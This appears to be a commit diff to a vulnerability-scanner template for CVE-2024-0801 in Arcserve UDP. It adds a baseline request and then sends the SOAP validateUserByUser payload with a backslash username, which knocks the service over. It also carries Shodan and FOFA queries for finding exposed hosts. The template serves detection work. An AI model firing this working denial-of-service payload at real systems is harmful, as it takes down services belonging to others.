Add more request CVE-2024-0801.yaml

2026-01-31 15:53:33 +08:00 · 2025-11-06 08:47:35 +07:00
parent 8a40bc0730
commit 90ace8c3e5
1 changed files with 29 additions and 12 deletions
--- a/http/cves/2024/CVE-2024-0801.yaml
+++ b/http/cves/2024/CVE-2024-0801.yaml
@@ -17,13 +17,19 @@ info:
    cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
-    max-request: 1
+    max-request: 2
    vendor: arcserve
    product: udp
    shodan-query: http.favicon.hash:1015186617
    fofa-query: icon_hash="1015186617"
  tags: cve,cve2024,arcserve,dos,intrusive,vkev

+flow: http(1) && http(2)
+
+variables:
+  user: "{{to_lower(rand_base(6))}}"
+  pass: "{{to_lower(rand_base(6))}}"
+
 http:
  - raw:
      - |
@@ -31,17 +37,28 @@ http:
        Host: {{Hostname}}
        Content-Type: text/xml

-        <?xml version="1.0" encoding="UTF-8"?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUser xmlns:ns2="http://webservice.edge.arcserve.ca.com/"><arg0>\</arg0><arg1>password</arg1><arg2>domain</arg2></ns2:validateUserByUser></S:Body></S:Envelope>
+        <?xml version="1.0" encoding="UTF-8"?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUser xmlns:ns2="http://webservice.edge.arcserve.ca.com/"><arg0>{{user}}</arg0><arg1>{{pass}}</arg1><arg2>domain</arg2></ns2:validateUserByUser></S:Body></S:Envelope>

-    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 503
-          - 502
+      - type: dsl
+        dsl:
+          - 'status_code == 500'
+          - 'contains(content_type, "text/xml")'
+          - 'contains(body, "Invalid user credentials")'
+        condition: and
+        internal: true

-      - type: word
-        part: body
-        words:
-          - "<h1>Service Unavailable</h1>"
-          - "<h1>Proxy Error</h1>"
+  - raw:
+      - |
+        POST /management/services/EdgeServiceConsoleImpl HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/xml
+
+        <?xml version="1.0" encoding="UTF-8"?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUser xmlns:ns2="http://webservice.edge.arcserve.ca.com/"><arg0>\</arg0><arg1>{{pass}}</arg1><arg2>domain</arg2></ns2:validateUserByUser></S:Body></S:Envelope>
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 503 && contains(body, "<h1>Service Unavailable</h1>")'
+          - 'status_code == 502 && contains(body, "<h1>Proxy Error</h1>")'
+        condition: or